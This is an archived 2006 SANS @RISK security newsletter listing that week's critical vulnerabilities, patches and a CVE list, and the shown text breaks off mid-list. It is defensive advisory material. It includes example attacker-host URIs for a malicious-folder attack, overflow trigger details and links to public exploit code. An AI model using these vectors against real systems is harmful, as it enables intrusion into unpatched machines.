|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
RISK: The Consensus Security Vulnerability Alert Vol. 5 No. 15
From: The SANS Institute (ConsensusSecurityVulnerabilityAlertsans.org)
Date: Mon Apr 17 2006 - 13:34:06 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Windows vulnerabilities and patches dominate this week's report, but
Novell and Firefox users also have work to do.
Before looking at this week's RISK, please complete this brief survey
and email it to top20sans.org.
The SANS 2005 Top20 Internet Security Vulnerabilities was done
differently than in previous years.
(a) Cross platform and application product vulnerabilities and
networking equipment vulnerabilities were added to the operating system
vulnerabilities.
(b) The vulnerabilities covered in the 2005 study spanned a year and
half of vulnerability data instead of trying to cover all of history.
Q1. Do you think those changes added value or made the Top-20 less
valuable?
Q2. We are discussing moving to semi-annual updates. What are the pros
and cons, from your perspective of moving to semi-annual updates?
Q4. What other data in the Top-20 would make this list more helpful?
Please send the answers and any other comments or concerns you have to
top20sans.org.
Alan
*************************************************************************
RISK: The Consensus Security Vulnerability Alert
April 17, 2006 Vol. 5. Week 15
*************************************************************************
RISK is the SANS community's consensus bulletin summarizing the most
important vulnerabilities and exploits identified during the past week
and providing guidance on appropriate actions to protect your systems
(PART I). It also includes a comprehensive list of all new
vulnerabilities discovered in the past week (PART II).
Summary of the vulnerabilities reported this week:
=================================================================
Platform # of Updates & Vulnerabilities
=================================================================
Windows 3 (#4)
Other Microsoft Products 6 (#1, #3, #6)
Third Party Windows Apps 1 (#11)
Linux 3
BSD 3
Solaris 2
Unix 1
Novell 1 (#2)
Cross Platform 10 (#5, #10)
Web Application - Cross Site Scripting 19
Web Application - SQL Injection 12 (#9)
Web Application 22 (#7, #8)
******************* Sponsored By Blue Lane Technologies *****************
Instant patch protection for Oracle without touching the server!
The Blue Lane(tm) Technologies PatchPoint(tm) System provides the only
patch alternative that can help you put an end to the patching cycle.
Eliminate reactive server patching, preserve application availability,
and reduce the risk in deploying patches to critical servers.
End your patch headaches today.
http://www.sans.org/info.php?id=1106
*************************************************************************
Part I -- Critical Vulnerabilities from TippingPoint, a division of 3Com
(www.tippingpoint.com)
Widely Deployed Software
(1) CRITICAL: Internet Explorer Cumulative Security Update (MS06-013)
(2) CRITICAL: Novell GroupWise Messenger Buffer Overflow
(3) HIGH: Microsoft Data Access Components Remote Code Execution (MS06-014)
(4) HIGH: Windows Explorer Remote Code Execution (MS06-015)
(5) HIGH: Mozilla, Firefox, Thunderbird Multiple Vulnerabilities
(6) MODERATE: Cumulative Security Update for Outlook Express (MS06-016)
Other Software
(7) HIGH: Multiple Software Remote File Include Vulnerabilities
Exploit Code/Details
(8) Horde Help Viewer Remote PHP Code Execution
(9) Symantec Sygate Management Server SQL Injection
(10) RealPlayer .SWF File Code Execution
(11) Sybase EAServer Buffer Overflow
************************ Sponsored Links ********************************
1) "Expediting Patching with Nuclear Fuels" - Free Webcast tomorrow -
a WhatWorks in Vulnerability Management webcast
Tuesday, April 18 at 1:00 PM EDT (1700 UTC/GMT)
http://www.sans.org/info.php?id=1107
2) from the SANS WhatWorks Poster - Free Vendor White Papers on a
wide range of security topics - http://www.sans.org/info.php?id=1108
3) SANS OnSite InfoSec Training Your Location! Your Schedule! Lower
Cost! http://www.sans.org/info.php?id=1109
*************************************************************************
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from
Qualys (www.qualys.com)
-- Windows
06.15.1 - Microsoft Internet Explorer COM Object Instantiation Code Execution
06.15.2 - Microsoft Outlook Express Windows Address Book File Parsing Buffer Overflow
06.15.3 - Microsoft Windows Shell COM Object Remote Code Execution
-- Other Microsoft Products
06.15.4 - Internet Explorer Invalid HTML Parsing Code Execution
06.15.5 - Microsoft Internet Explorer Double Byte Character Memory Corruption
06.15.6 - Internet Explorer Erroneous IOleClientSite Data Zone Bypass
06.15.7 - Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution
06.15.8 - Internet Explorer Persistent Window Content Address Bar Spoofing
06.15.9 - Microsoft Internet Explorer HTML Tag Memory Corruption
-- Third Party Windows Apps
06.15.10 - TUGZip Remote Directory Traversal
-- Linux
06.15.11 - Linux Kernel __keyring_search_one Local Denial of Service
06.15.12 - mnoGoSearch-Common Local Database Administrator Password Disclosure
06.15.13 - Linux Kernel Perfmon.c Local Denial of Service
-- BSD
06.15.14 - NetBSD False Intel Hardware RNG Detection Predictable Random Number Generation Weakness
06.15.15 - NetBSD SIOCGIFALIAS IOCTL Local Denial of Service
06.15.16 - NetBSD Sysctl Local Denial of Service
-- Solaris
06.15.17 - Sun Solaris SH Local Denial of Service
06.15.18 - Sun Solaris LDAP2 RootDN Password Disclosure
-- Unix
06.15.19 - Sybase EAServer Manager Connection Cache Password Disclosure
-- Novell
06.15.20 - Novell GroupWise Messenger Accept Language Remote Buffer Overflow
-- Cross Platform
06.15.21 - Oracle Database Access Restriction Bypass
06.15.22 - Imager JPEG and TGA Images Denial of Service
06.15.23 - fbida FBGS Insecure Temporary File Creation
06.15.24 - Cyrus SASL Remote Digest-MD5 Denial of Service
06.15.25 - XScreenSaver Local Password Disclosure
06.15.26 - Firefox HTML Parsing Null Pointer Dereference Denial of Service
06.15.27 - Adobe Document Server for Reader Extensions Multiple Remote Vulnerabilities
06.15.28 - W3C Amaya Multiple Remote Buffer Overflow Vulnerabilities
06.15.29 - Adobe LiveCycle OBSOLETE User Access Validation
06.15.30 - Opera Web Browser Stylesheet Attribute Buffer Overflow
-- Web Application - Cross Site Scripting
06.15.31 - phpMyForum Index.PHP Multiple Cross-Site Scripting Vulnerabilities
06.15.32 - PHPWebGallery Multiple Cross-Site Scripting Vulnerabilities
06.15.33 - MyBulletinBoard Newthread.PHP Cross-Site Scripting
06.15.34 - Shadowed Portal Load.PHP Cross-Site Scripting
06.15.35 - MyBulletinBoard Multiple HTML Injection Vulnerabilities
06.15.36 - TalentSoft Web+ Shop Deptname Parameter Cross-Site Scripting
06.15.37 - JBook Index.PHP Cross-Site Scripting
06.15.38 - Gallery Unspecified Cross-Site Scripting
06.15.39 - XMB Forum Flash Video Cross-Site Scripting
06.15.40 - SWSoft Confixx Jahr Parameter Cross-Site Scripting
06.15.41 - JetPhoto Multiple Cross-Site Scripting Vulnerabilities
06.15.42 - Tritanium Bulletin Board Multiple Cross-Site Scripting Vulnerabilities
06.15.43 - Manila Multiple Cross-Site Scripting Vulnerabilities
06.15.44 - Autogallery Multiple Cross-Site Scripting Vulnerabilities
06.15.45 - interaktiv.shop Multiple Cross-Site Scripting Vulnerabilities
06.15.46 - phpMyAdmin SQL.PHP Cross-Site Scripting
06.15.47 - MyBB Member.PHP Cross-Site Scripting
06.15.48 - Simplog Login.PHP Cross-Site Scripting
06.15.49 - PatroNet CMS Index.PHP Cross-Site Scripting
-- Web Application - SQL Injection
06.15.50 - XBrite Members.PHP SQL Injection
06.15.51 - APT-webshop Modules.PHP Multiple SQL Injection Vulnerabilities
06.15.52 - dnGuestbook Admin.PHP SQL Injection Vulnerabilities
06.15.53 - ShopWeezle Multiple SQL Injection Vulnerabilities
06.15.54 - Clansys Index.PHP SQL Injection
06.15.55 - JBook Form.PHP SQL Injection Vulnerabilities
06.15.56 - Dokeos Viewtopic.PHP SQL Injection
06.15.57 - PHPKIT Include.PHP SQL Injection
06.15.58 - SWSoft Confixx Index.PHP SQL Injection
06.15.59 - Chipmunk Guestbook Index.PHP SQL Injection
06.15.60 - Simplog Multiple SQL Injection Vulnerabilities
06.15.61 - PHP121 PHP121LOGIN.PHP SQL Injection
-- Web Application
06.15.62 - PHPList Index.PHP Local File Include
06.15.63 - SIRE Arbitrary File Upload
06.15.64 - SPIP Spip_login.PHP Remote File Include
06.15.65 - VegaDNS Multiple Input Validation Vulnerabilities
06.15.66 - SQuery LibPath Parameter Multiple Remote File Include Vulnerabilities
06.15.67 - AWeb's Scripts Seller Buy.PHP Authorization Bypass
06.15.68 - Matt Wright Guestbook Guestbook.PL Multiple HTML Injection Vulnerabilities
06.15.69 - PHP Multiple Safe_Mode and Open_Basedir Restriction Bypass Vulnerabilities
06.15.70 - VWar Admin.PHP Remote File Include
06.15.71 - AzDGVote Remote File Include
06.15.72 - SmartISoft phpListPro Config.PHP Remote File Include
06.15.73 - Clever Copy Connect.INC Information Disclosure
06.15.74 - Blursoft Blur6ex Multiple Input Validation Vulnerabilities
06.15.75 - Phgstats Phgstats.Inc.PHP Remote File Include
06.15.76 - Indexu Multiple Remote File Include Vulnerabilities
06.15.77 - Saxopress URL Parameter Directory Traversal
06.15.78 - MvBlog Multiple Input Validation Vulnerabilities
06.15.79 - Plone MembershipTool Access Control Bypass
06.15.80 - Simplog Remote File Include
06.15.81 - SimpleBBS Remote Arbitrary Command Execution
06.15.82 - Censtore Remote Arbitrary Command Execution
06.15.83 - Sphider Configset.PHP Remote File Include
_____________________________________________________________________
PART I Critical Vulnerabilities
Part I is compiled by Rohit Dhamankar at TippingPoint, a division of
3Com, as a by-product of that company's continuous effort to ensure that
its intrusion prevention products effectively block exploits using known
vulnerabilities. TippingPoint's analysis is complemented by input from
a council of security managers from twelve large organizations who
confidentially share with SANS the specific actions they have taken to
protect their systems. A detailed description of the process may be
found at http://www.sans.org/newsletters/cva/#process
Archives at http://www.sans.org/newsletters/risk
*************************
Widely Deployed Software
*************************
(1) CRITICAL: Internet Explorer Cumulative Security Update (MS06-013)
Affected:
Internet Explorer versions 5.01 and 6.0
Description: Microsoft has released a cumulative security update for
Internet Explorer that fixes multiple vulnerabilities as well as
provides enhanced security checks for ActiveX controls. This update
addresses the 0-day flaw in IE's "createTextRange" function that is
being actively exploited. The update fixes the following 8 remote code
execution vulnerabilities that can be exploited by a malicious webpage
to execute arbitrary code on a user's system.
(a) IE contains a memory corruption vulnerability when methods designed
for certain HTML objects are applied to other HTML objects.
(b) IE contains a memory corruption vulnerability that can be triggered
by an HTML page containing a hundred or more of script action handlers
such as "onclick", "onmouseover" etc.
(c) IE's security checks and a user dialog box can be bypassed by a
malicious HTML application.
(d) IE contains a memory corruption vulnerability in handling specially
crafted HTML code.
(e) IE contains a memory corruption vulnerability in instantiating COM
objects that were not originally designed to be used in that fashion.
(f) IE contains a memory corruption vulnerability in handling a
specially crafted tag in an HTML element.
(g) IE contains a memory corruption vulnerability in handling specially
crafted URLs with Double-Byte character sets.
(h) IE contains a remote code execution vulnerability in handling
dynamically created embedded objects.
In addition to these remote code execution vulnerabilities, the patch
also addresses an information disclosure and a spoofing vulnerability
(reported last week). The patch sets the kill bit for the ActiveX
controls included with Danim.dll and Dxtmsft.dll. The technical details
for a number of these flaws have not been publicly posted yet.
Status: Apply the patch referenced in the Microsoft Security Bulletin
MS06-013 as soon as possible. Microsoft has already documented known
issues after applying this update. Please refer to the following
KB912812 http://support.microsoft.com/kb/912812 .
Council Site Actions: All reporting council sites are responding to
this item. Some of the sites are updating their systems on an
accelerated schedule, while others are using their normal update
process. The desktop systems are on a longer update cycle due to the
need for more extensive regression testing.
References:
Microsoft Security Bulletin MS06-013
http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
Additional IE Vulnerabilities (Yet non-patched)
http://archives.neohapsis.com/archives/bugtraq/2006-04/0248.html
Previous RISK Postings
http://www.sans.org/newsletters/risk/display.php?v=5&i=11#widely4
(Script Handler Memory Corruption)
http://www.sans.org/newsletters/risk/display.php?v=5&i=12#widely1
(CreateTextRange Remote Code Execution)
http://www.sans.org/newsletters/risk/display.php?v=5&i=14#widely2
(Address Bar Spoofing)
SecurityFocus BIDs
http://www.securityfocus.com/bid/17450
http://www.securityfocus.com/bid/17453
http://www.securityfocus.com/bid/17454
http://www.securityfocus.com/bid/17455
http://www.securityfocus.com/bid/17457
http://www.securityfocus.com/bid/17460
http://www.securityfocus.com/bid/17468
****************************************************************
(2) CRITICAL: Novell GroupWise Messenger Buffer Overflow
Affected:
Novell GroupWise Messenger version 2.0
Description: Novell GroupWise Messenger is an instant messaging solution
for internal communications in an organization. The Messenger server
runs a web server on port 8300/tcp by default. This web server contains
a buffer overflow that can be triggered by an HTTP request with the
"Accept-Language" HTTP header longer than 16 bytes. The flaw can be
exploited to execute arbitrary code on the Messenger server with
"SYSTEM/root" privileges. Exploit code has been publicly posted.
Status: Novell has released version 2.0 Beta2 to fix this issue. The fix
will also be included in the 2.0 service pack.
Council Site Actions: The affected software and/or configuration are not
in production or widespread use, or are not officially supported at any
of the council sites. They reported that no action was necessary.
References:
Novell Advisory
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100861.htm
ZDI Advisory
http://archives.neohapsis.com/archives/bugtraq/2006-04/0265.html
Exploit Code
http://metasploit.blogspot.com/2006/04/exploit-development-groupwise_14.html
http://metasploit.com/projects/Framework/exploits.html#novell_messenger_acceptlang
Product Homepage and Information
http://www.novell.com/collateral/4613331/4613331.html
http://www.novell.com/coolsolutions/feature/9840.html
SecurityFocus BIDs
http://www.securityfocus.com/bid/17503
********************************************************************
(3) HIGH: Microsoft Data Access Components Remote Code Execution (MS06-014)
Affected:
Windows installations with:
Microsoft Data Access Components version 2.5 SP3, 2.7 SP1, 2.8 and 2.8 SP1
Windows XP/2003 (default configuration)
Description: Microsoft Data Access Components (MDAC) is a collection of
functions that provide support for common database operations, such as
connecting to remote databases and returning data to a client. The
RDS.Dataspace ActiveX control, that ships as a part of MDAC, contains a
remote code execution vulnerability. A malicious webpage or an HTML
email invoking the ActiveX control with crafted parameters can
compromise a user's system. The technical details required to leverage
this flaw have not been publicly posted yet.
Status: Apply the patch referenced in the Microsoft Security Bulletin
MS06-014.
Council Site Actions: All reporting council sites are responding to
this item. Some of the sites are updating their systems on an
accelerated schedule, while others are using their normal update
process. One site voiced some concerns that internal apps may be
impacted since the patch addresses some ActiveX behavior. The desktop
systems are on a longer update cycle due to the need for more extensive
regression testing.
References:
Microsoft Security Bulletin MS06-014
http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx
RDS Tutorial
http://msdn.microsoft.com/library/en-us/ado270/htm/mdmsctherdsprogrammingmodelindetail.asp
SecurityFocus BID
http://www.securityfocus.com/bid/176463
****************************************************************
(4) HIGH: Windows Explorer Remote Code Execution (MS06-015)
Affected:
Windows 2000/XP/2003
Description: The "desktop.ini", a hidden file when present in a Windows
folder, instructs Windows Explorer how to display the folder's contents.
A problem arises when the ".ShellClassInfo" section in a folder's
desktop.ini file points to an executable program. This feature can be
exploited to execute arbitrary code on a client system when an
unsuspecting user opens such a specially crafted folder. There is also
a second way to create a malicious folder that has not been publicly
disclosed. To exploit the flaw, an attacker would have to create a
malicious "shared" folder and entice a victim to open it via WebDAV or
SMB. The attacker can include the folder's URI for
e.g.\\attacker-ip\bad-folder(SMB) or
http://attacker-ip/bad-folder(WebDAV), in a webpage or email it to a
potential victim.
Status: Apply the patch contained in the Microsoft Security Bulletin
MS06-015. Block the ports 139/tcp and 445/tcp as it will block some
attack vectors.
Council Site Actions: All reporting council sites are responding to
this item. Some of the sites are updating their systems on an
accelerated schedule, while others are using their normal update
process. The desktop systems are on a longer update cycle due to the
need for more extensive regression testing.
References:
Microsoft Security Bulletin
http://www.microsoft.com/technet/security/Bulletin/MS06-015.mspx
Previous RISK Newsletter Posting from 2004
http://www.sans.org/newsletters/risk/vol3_20.php (Item #4)
SecurityFocus BID
http://www.securityfocus.com/bid/17464
****************************************************************
(5) HIGH: Mozilla, Firefox, Thunderbird Multiple Vulnerabilities
Affected:
Firefox versions prior to 1.5.0.2
Mozilla versions prior to 1.7.13
Thunderbird versions prior to 1.5.0.2
SeaMonkey versions prior to 1.0.1
Description: Mozilla foundation has released a security update for
Mozilla and Firefox browsers, Thunderbird email client and SeaMonkey
code framework. The security update fixes 11 vulnerabilities that can
be exploited by a malicious webpage to execute arbitrary code on a
user's system. In addition, the patch also fixes 8 other vulnerabilities
related to spoofing, cross-site scripting and information disclosure.
The technical details and exploit code are included in the Mozilla
bugzilla but they will not be publicly accessible during the patch
period.
Status: Upgrade to Firefox and Thunderbird version 1.5.0.2, Mozilla
version 1.7.13 and SeaMonkey version 1.0.1. Ensure that users turn on
the "automatic download and update installation" option in the
Tools->Advanced->Update menu for the software.
References:
Mozilla Advisories
http://www.mozilla.org/security/announce/2006/mfsa2006-09.html
http://www.mozilla.org/security/announce/2006/mfsa2006-10.html
http://www.mozilla.org/security/announce/2006/mfsa2006-11.html
http://www.mozilla.org/security/announce/2006/mfsa2006-12.html
http://www.mozilla.org/security/announce/2006/mfsa2006-13.html
http://www.mozilla.org/security/announce/2006/mfsa2006-14.html
http://www.mozilla.org/security/announce/2006/mfsa2006-15.html
http://www.mozilla.org/security/announce/2006/mfsa2006-16.html
http://www.mozilla.org/security/announce/2006/mfsa2006-17.html
http://www.mozilla.org/security/announce/2006/mfsa2006-18.html
http://www.mozilla.org/security/announce/2006/mfsa2006-19.html
http://www.mozilla.org/security/announce/2006/mfsa2006-20.html
http://www.mozilla.org/security/announce/2006/mfsa2006-22.html
http://www.mozilla.org/security/announce/2006/mfsa2006-23.html
http://www.mozilla.org/security/announce/2006/mfsa2006-24.html
http://www.mozilla.org/security/announce/2006/mfsa2006-25.html
http://www.mozilla.org/security/announce/2006/mfsa2006-28.html
http://www.mozilla.org/security/announce/2006/mfsa2006-29.html
ZDI Advisory
http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0350.html
SecurityFocus BID
http://www.securityfocus.com/bid/17516
****************************************************************
(6) MODERATE: Cumulative Security Update for Outlook Express (MS06-016)
Affected:
Windows 2000/XP/2003
Description: Microsoft has released a cumulative security update for
Outlook Express that fixes a buffer overflow vulnerability. The flaw is
triggered when Outlook Express tries to parse a specially crafted
Windows Address Book (.wab) file. The overflow can be exploited to
execute arbitrary code on a user's system. In order to exploit the
overflow, an attacker has to host a webpage containing a malicious wab
file or send it to the victims as an email attachment. Note that user
interaction is required to open the wab file. The technical details
required to craft a malicious wab file have not been posted yet.
Status: Apply the patch referenced in the Microsoft Security Bulletin
MS06-016.
Council Site Actions: All reporting council sites are responding to this
item. Some of the sites are updating their systems on an accelerated
schedule, while others are using their normal update process. The
desktop systems are on a longer update cycle due to the need for more
extensive regression testing.
References:
Microsoft Security Bulletin
http://www.microsoft.com/technet/security/Bulletin/MS06-016.mspx
SecurityFocus BID
http://www.securityfocus.com/bid/17459
****************************************************************
***************
Other Software
***************
(7) HIGH: Multiple Software Remote File Include Vulnerabilities
Description: The following moderate to widely used web software packages
reportedly contain remote file include vulnerabilities: vBulletin,
Simplog, PAJAX, sphider, phpListPro, phpWebSite and Indexu. These flaws
can be exploited by a remote attacker to run arbitrary code on the
webserver hosting the vulnerable software packages. The postings show
how to craft the malicious HTTP requests to exploit the flaws.
References:
vBulletin
Posting by ReZEN
http://www.milw0rm.com/exploits/1668
http://archives.neohapsis.com/archives/bugtraq/2006-04/0247.html
SecurityFocus BID
http://www.securityfocus.com/bid/17206
Simplog
Posting by rgod
http://archives.neohapsis.com/archives/bugtraq/2006-04/0232.html
Vendor Homepage
http://www.simplog.org/
SecurityFocus BID
http://www.securityfocus.com/bid/17490
phpWebSite
Posting by rgod
http://www.milw0rm.com/exploits/1673
SecurityFocus BID
http://www.securityfocus.com/bid/17521
PAJAX
Posting by RedTeam
http://www.milw0rm.com/exploits/1672
SecurityFocus BID
http://www.securityfocus.com/bid/17519
phpListPro
Posting by Aesthetico
http://archives.neohapsis.com/archives/bugtraq/2006-04/0206.html
SecurityFocus BID
http://www.securityfocus.com/bid/17448
sphider
Posting by rgod
http://www.milw0rm.com/exploits/1665
SecurityFocus BID
http://www.securityfocus.com/bid/17514
Indexu
Posting by Sniper
http://www.securityfocus.com/archive/1/430599
Securityfocus BID
http://www.securityfocus.com/bid/17470
**********************************************************************
*********************
Exploit Code/Details
*********************
(8) Horde Help Viewer Remote PHP Code Execution
References:
Exploit Code
http://downloads.securityfocus.com/vulnerabilities/exploits/horde_help_module.pm
Previous RISK Newsletter Posting
http://www.sans.org/newsletters/risk/display.php?v=5&i=13#06.13.89
**********************************************************************
(9) Symantec Sygate Management Server SQL Injection
References:
Exploit Code
http://metasploit.com/projects/Framework/exploits.html#sygate_policy_manager
Previous RISK Newsletter Posting
http://www.sans.org/newsletters/risk/display.php?v=5&i=5#other1
***********************************************************************
(10) RealPlayer .SWF File Code Execution
Council Site Updates: The software is not officially supported at any
of the reporting council sites. However a few sites plan to upgrade
their systems during the next regularly scheduled patch cycle. One site
has already updated their systems.
References:
Posting by NevisLabs
http://archives.neohapsis.com/archives/bugtraq/2006-04/0207.html
Previous RISK NEwsletter Posting
http://www.sans.org/newsletters/risk/display.php?v=5&i=12#widely3
***********************************************************************
(11)Sybase EAServer Buffer Overflow
References:
Exploit Code
http://metasploit.com/projects/Framework/exploits.html#sybase_easerver
Previous RISK Newsletter Posting
http://www.sans.org/newsletters/risk/display.php?v=4&i=29#other2
****************************************************************
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 15, 2006
This list is compiled by Qualys ( www.qualys.com ) as part of that
company's ongoing effort to ensure its vulnerability management web
service tests for all known vulnerabilities that can be scanned. As of
this week Qualys scans for 4974 unique vulnerabilities. For this
special SANS community listing, Qualys also includes vulnerabilities
that cannot be scanned remotely.
______________________________________________________________________
06.15.1 CVE: CVE-2006-1186
Platform: Windows
Title: Microsoft Internet Explorer COM Object Instantiation Code
Execution
Description: Microsoft Internet Explorer is prone to a memory
corruption vulnerability that is related to the instantiation of COM
objects. The vulnerability arises because of the way Internet Explorer
attempts to instantiate certain COM objects as ActiveX controls. The
COM objects may let remote attackers corrupt process memory and
facilitate arbitrary code execution in the context of the currently
logged in user on the affected computer.
Ref: http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
______________________________________________________________________
06.15.2 CVE: CVE-2006-0014
Platform: Windows
Title: Microsoft Outlook Express Windows Address Book File Parsing
Buffer Overflow
Description: Microsoft Outlook Express is prone to a remote buffer
overflow vulnerability. Specifically, this vulnerability presets
itself when the application processes a specially crafted Windows
Address Book (.wab) file.
Ref: http://www.microsoft.com/technet/security/bulletin/MS06-016.mspx
______________________________________________________________________
06.15.3 CVE: CVE-2006-0012
Platform: Windows
Title: Microsoft Windows Shell COM Object Remote Code Execution
Description: Microsoft Windows Shell is susceptible to a remote code
execution vulnerability due to a flaw in its handling of remote COM
objects. This issue is exploited by creating a website that forces
Windows Explorer to initiate a connection to a remote file server. The
remote file server then causes Windows Explorer to fail in an
unspecified manner, and to then execute remotely-supplied executable
machine code.
Ref: http://www.microsoft.com/technet/security/Bulletin/MS06-015.mspx
______________________________________________________________________
06.15.4 CVE: CVE-2006-1185
Platform: Other Microsoft Products
Title: Internet Explorer Invalid HTML Parsing Code Execution
Description: Microsoft Internet Explorer is vulnerable to an
unspecified invalid HTML parsing code execution which causes memory
corruption. See Microsoft's advisory for further details.
Ref: http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx
______________________________________________________________________
06.15.5 CVE: CVE-2006-1189
Platform: Other Microsoft Products
Title: Microsoft Internet Explorer Double Byte Character Memory
Corruption
Description: Microsoft Internet Explorer is prone to a memory
corruption vulnerability. This is related to an error in how double
byte character set (DBCS) characters are handled in IP addresses from
rendered HTML content. This could let an attacker corrupt sensitive
variables in memory with attacker specified data. In this manner it
may be possible to execute arbitrary code by overwriting variables
related to program control.
Ref: http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
______________________________________________________________________
06.15.6 CVE: CVE-2006-1190
Platform: Other Microsoft Products
Title: Internet Explorer Erroneous IOleClientSite Data Zone Bypass
Description: Microsoft Internet Explorer is prone to a zone bypass
issue. which is due to the browser returning erroneous IOleClientSite
when dynamically creating an embedded object. Microsoft has released a
security update MS06-013 to address this issue.
Ref: http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
______________________________________________________________________
06.15.7 CVE: CVE-2006-0003
Platform: Other Microsoft Products
Title: Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code
Execution
Description: Microsoft Data Access Components (MDAC) provide
components for database access. The MDAC RDS.Dataspace ActiveX control
is vulnerable to an unspecified remote code execution. Microsoft Data
Access Components (MDAC) versions 2.7 and 2.8 are vulnerable.
Ref: http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx
______________________________________________________________________
06.15.8 CVE: CVE-2006-1192
Platform: Other Microsoft Products
Title: Internet Explorer Persistent Window Content Address Bar
Spoofing
Description: Microsoft Internet Explorer is vulnerable to an address
bar spoofing issues because it is possible for the content of a web
page to persist while the browser window navigates to another site.
Microsoft Internet Explorer versions 6.0 SP2 and earlier are
vulnerable.
Ref: http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
______________________________________________________________________
06.15.9 CVE: CVE-2006-1188
Platform: Other Microsoft Products
Title: Microsoft Internet Explorer HTML Tag Memory Corruption
Description: Microsoft Internet Explorer is prone to a memory
corruption vulnerability. This is related to the handling of certain
HTML tags. This issue could let an attacker corrupt sensitive memory
with attacker specified data. In this manner it may be possible to
execute arbitrary code by overwriting variables related to program
control.
Ref: http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
______________________________________________________________________
06.15.10 CVE: Not Available
Platform: Third Party Windows Apps
Title: TUGZip Remote Directory Traversal
Description: TUGZip is a file-archiving/compression application. It is
affected by a directory traversal issue when the application processes
malicious GZ, JAR, RAR and ZIP archives. TUGZip version 3.4 and
earlier are affected.
Ref: http://www.securityfocus.com/bid/17432
______________________________________________________________________
06.15.11 CVE: CVE-2006-1522
Platform: Linux
Title: Linux Kernel __keyring_search_one Local Denial of Service
Description: The Linux kernel is vulnerable to a local
denial-of-service issue due to the
"__keyring_search_one" function allowing a non-keyring key request.
Linux kernel versions 2.6.16.3 and earlier are vulnerable.
Ref: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=188466
______________________________________________________________________
06.15.12 CVE: Not Available
Platform: Linux
Title: mnoGoSearch-Common Local Database Administrator Password
Disclosure
Description: Debian has a "debconf" utility that is used to ask and
store configuration-related questions when installing packages. The
"debconf" package improperly stores password for the database created
during the "mnogosearch-common" package installation process in
insecure "config.dat" file. Please see attached advisory for a list of
vulnerable versions.
Ref: http://www.securityfocus.com/bid/17477
______________________________________________________________________
06.15.13 CVE: CVE-2006-0558
Platform: Linux
Title: Linux Kernel Perfmon.c Local Denial of Service
Description: The Linux kernel is prone to a local denial of service
vulnerability. This issue presents itself in "perfmon.c" on IA-64
platforms during exit processing when a task calls
"pfm_context_create()" and "pfm_smpl_buffer_alloc()". An attacker must
interrupt the task and another process must access its "mm_struct" for
this condition to arise.
Ref: http://marc.theaimsgroup.com/?l=linux-ia64&m=113882384921688
______________________________________________________________________
06.15.14 CVE: Not Available
Platform: BSD
Title: NetBSD False Intel Hardware RNG Detection Predictable Random
Number Generation Weakness
Description: NetBSD running on Intel chips provides a driver that
employs the hardware random number generator (RNG) to gather entropy
for the NetBSD kernel random number generator, rnd(4). It is prone to
a predictable key generation weakness due to incorrect Intel hardware
RNG detection. This issue arises on NetBSD systems with i8xx
motherboard chipset for x86 CPUs.
Ref: http://www.securityfocus.com/bid/17496
______________________________________________________________________
06.15.15 CVE: Not Available
Platform: BSD
Title: NetBSD SIOCGIFALIAS IOCTL Local Denial of Service
Description: NetBSD is a Unix operating system. It is vulnerable to a
denial of service issue because it does not handle exceptional
conditions when the SIOCGIFALIAS IOCTL is used to get information
about an alias that does not exist. NetBSD versions 3.0 and earlier
are vulnerable.
Ref: http://www.securityfocus.com/bid/17497/info
______________________________________________________________________
06.15.16 CVE: Not Available
Platform: BSD
Title: NetBSD Sysctl Local Denial of Service
Description: NetBSD is a Unix operating system. It is vulnerable to a
local denial of service issue arises when the sysctl function attempts
to lock a user-supplied buffer that is used to store the results
without checking the buffer's size. It may cause resource exhaustion.
NetBSD versions 3.0 and earlier are vulnerable.
Ref: http://www.securityfocus.com/bid/17498
______________________________________________________________________
06.15.17 CVE: Not Available
Platform: Solaris
Title: Sun Solaris SH Local Denial of Service
Description: Sun Solaris Bourne shell (sh) is prone to a local denial
of service vulnerability. This vulnerability arises when a local
unprivileged user creates temporary files in an unknown malicious
manner.
Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102282-1
______________________________________________________________________
06.15.18 CVE: CVE-2006-1782
Platform: Solaris
Title: Sun Solaris LDAP2 RootDN Password Disclosure
Description: Sun Solaris LDAP2 is vulnerable to an information
disclosure issue. Local unprivileged users may discover the Directory
Server root Distinguished Name (rootDN) password if a privileged user
uses the idsconfig command. Solaris versions 8 and 9 are vulnerable.
Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102113-1
______________________________________________________________________
06.15.19 CVE: Not Available
Platform: Unix
Title: Sybase EAServer Manager Connection Cache Password Disclosure
Description: Sybase EAServer is an application server for hosting
business applications. It is vulnerable to a passwowrd disclosure
issue through the connection cache. EAServer versions 5.2 and 5.3 are
vulnerable.
Ref: http://www.sybase.com/detail?id=1040117
______________________________________________________________________
06.15.20 CVE: Not Available
Platform: Novell
Title: Novell GroupWise Messenger Accept Language Remote Buffer
Overflow
Description: Novell GroupWise Messenger is an instant-messaging
solution. It is affected by a buffer overflow issue that arises when
the server handles an "Accept-Language" header containing more than 16
bytes of data that doesn't contain any commas or semicolons. Novell
GroupWise Messenger version 2.0 is affected.
Ref: http://www.securityfocus.com/bid/17503
______________________________________________________________________
06.15.21 CVE: CVE-2006-1705
Platform: Cross Platform
Title: Oracle Database Access Restriction Bypass
Description: Oracle Database is vulnerable to an access restriction
bypass issue due to the failure of the application to properly
enforce read-only privileges for user roles with "SELECT" privileges.
Oracle versions 9.2.0.0 through 10.2.0.3 are vulnerable.
Ref: http://www.frsirt.com/english/advisories/2006/1297
______________________________________________________________________
06.15.22 CVE: CVE-2006-0053
Platform: Cross Platform
